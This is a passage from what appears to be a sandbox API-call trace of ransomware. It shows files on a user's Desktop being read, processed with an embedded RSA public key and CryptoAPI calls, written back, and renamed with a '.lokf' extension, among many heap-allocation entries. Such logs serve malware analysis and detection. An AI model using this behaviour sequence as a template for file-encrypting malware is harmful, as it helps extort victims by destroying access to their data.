StringUuid=0x9f4fa40) returned 0x0 [0058.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.523] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xf7e0) returned 0x9c82710 [0058.523] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0058.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0058.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32989f8 [0058.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ae48 [0058.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298c80 [0058.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ae60 [0058.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ae90 [0058.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6aea8 [0058.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0058.523] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x32947b0 [0058.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32949d0 [0058.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ae90 | out: hHeap=0x660000) returned 1 [0058.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aea8 | out: hHeap=0x660000) returned 1 [0058.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949d0 | out: hHeap=0x660000) returned 1 [0058.524] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.524] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xf7db, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.524] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.524] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.524] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.524] CloseHandle (hObject=0x5cc) returned 1 [0058.525] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bSgKDO2SM-AQU.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bsgkdo2sm-aqu.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bSgKDO2SM-AQU.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bsgkdo2sm-aqu.mp3.lokf")) returned 1 [0058.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.526] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0058.527] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92bd4f20, ftCreationTime.dwHighDateTime=0x1d4cc7f, ftLastAccessTime.dwLowDateTime=0x947af260, ftLastAccessTime.dwHighDateTime=0x1d4c755, ftLastWriteTime.dwLowDateTime=0x947af260, ftLastWriteTime.dwHighDateTime=0x1d4c755, nFileSizeHigh=0x0, nFileSizeLow=0x107a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cxkxIuDq.m4a", cAlternateFileName="")) returned 1 [0058.527] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cxkxIuDq.m4a") returned=".m4a" [0058.527] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cxkxIuDq.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cxkxiudq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.527] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=67490) returned 1 [0058.527] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.529] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1077c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.529] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.530] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x107a2, lpOverlapped=0x0) returned 1 [0058.530] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.530] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.531] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.531] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.531] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.531] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.531] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.531] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.531] GetLastError () returned 0x0 [0058.531] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.531] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.532] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.532] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.532] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.532] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.532] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.532] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.532] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.532] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aea8 | out: hHeap=0x660000) returned 1 [0058.532] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aec0 | out: hHeap=0x660000) returned 1 [0058.532] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.532] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.532] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.532] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.532] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0058.532] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6aec0 [0058.532] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.532] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6aea8 [0058.532] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0058.532] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.532] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.532] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0058.532] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.532] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aec0 | out: hHeap=0x660000) returned 1 [0058.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aea8 | out: hHeap=0x660000) returned 1 [0058.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0058.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.533] GetCurrentThreadId () returned 0x9e0 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x6c2ed0 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.533] GetCurrentThreadId () returned 0x9e0 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3292fe8 [0058.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3282810 [0058.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6aea8 [0058.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0058.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6aec0 [0058.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ae90 [0058.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0058.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0058.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0058.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6aed8 [0058.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0058.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0058.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0058.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.535] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0058.535] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.535] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0058.535] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aea8 | out: hHeap=0x660000) returned 1 [0058.535] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6aea8 [0058.535] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.535] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0058.535] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.535] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0058.535] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.535] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0058.535] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.535] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3296fa8 [0058.535] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.535] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0058.535] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aea8 | out: hHeap=0x660000) returned 1 [0058.535] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0058.535] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0058.535] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x32679f8 [0058.535] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.535] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0058.535] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3292fe8 | out: hHeap=0x660000) returned 1 [0058.535] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32679f8 | out: hHeap=0x660000) returned 1 [0058.535] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0058.535] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0058.535] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.535] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0058.535] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296fa8 | out: hHeap=0x660000) returned 1 [0058.535] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aed8 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aec0 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ae90 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ae78 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3298cc8 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3282810 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0058.536] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c82710*, nNumberOfBytesToWrite=0x1079d, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c82710*, lpNumberOfBytesWritten=0x9f4fb14*=0x1079d, lpOverlapped=0x0) returned 1 [0058.537] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0058.537] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x107a2, lpNewFilePointer=0x0, 